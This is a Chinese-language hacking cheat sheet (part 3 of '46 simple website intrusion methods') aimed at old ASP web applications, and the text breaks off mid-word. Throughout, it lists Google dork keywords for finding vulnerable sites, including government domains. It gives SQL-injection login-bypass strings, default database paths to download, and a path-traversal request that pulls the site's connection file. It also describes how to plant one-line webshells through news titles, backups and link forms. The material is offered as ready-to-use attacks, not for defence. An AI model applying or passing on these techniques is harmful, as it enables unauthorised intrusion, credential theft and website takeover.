46种简单入侵网站方法(3)

后台地址:自己扫描!

40.
一、通过GOOGLE搜索找大量注入点
关键字：asp?id=1 gov.jp/ asp?id=
页数：100
语言：想入侵哪个国家就填什么语言吧

41.
关键字：Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd

42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录　进入
默认数据库地址atabase/DataShop.mdb

43.
关键字:六合彩 inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马

44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!

45.
关键字：程序核心：BJXSHOP网上开店专家
后台:/admin

46
批量入侵新云系统！
搜索关键词:关于本站 网站帮助 广告合作 下载声明 友情连接 网站
地图
找到以后缀添加:user/reg.asp
工具：啊D注入D_SQLTools2.0和COOKIES欺骗工具
先来注册 发布个文章 得到的地址用啊D扫下 他默认的表段名字是NC_admin

默认数据库: Databases/myszw.mdb Databases/myszw1.mdb
上传 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
关键字：网站建设公司企业网站管理系统
后缀： admin/login.asp
---------------------------------------
关键字：网梦购物系统 gCS木马
GOOGLE里搜索关键字:
上面的这个名字只是该留言者使用的昵称,不代表任何管理员身份!
把index.asp换成 mdb/vcsbook.asp
代码：
---------------------------------------
关键子：inurl:Went.asp
后缀：manage/login.asp
密码：'or''=''or'
============================
关键字：acblog
blogdata/acblog.asa 默认数据库。
=======================================
关键字:Copyright ? 2005-2008??Power
然后写入默认数据库：databass/datashop.asp
在网址后面加上主页后面加上：linktianjia.asp
申请连接输入一句话代码：
或者点下面的管理入口 密码：'or'='or'
一句话连接的时候在网站后面加上：databass/datashop.asp
========================================================
关键词 co net mib ver 1.0 design by hypo
搜索网站
密码 'or'='or'
==============================================
新云漏洞：把/flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp 找到数据库地址比如 这个站 那么数据库地址就是 /database\xzws.mdb 大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了如:#xzws.mdb 改成%2
3xzws.mdb 那么数据库就是/database\%23xzws.mdb然后下载 数据库
======================================================
网站猎手 一句话木马
关键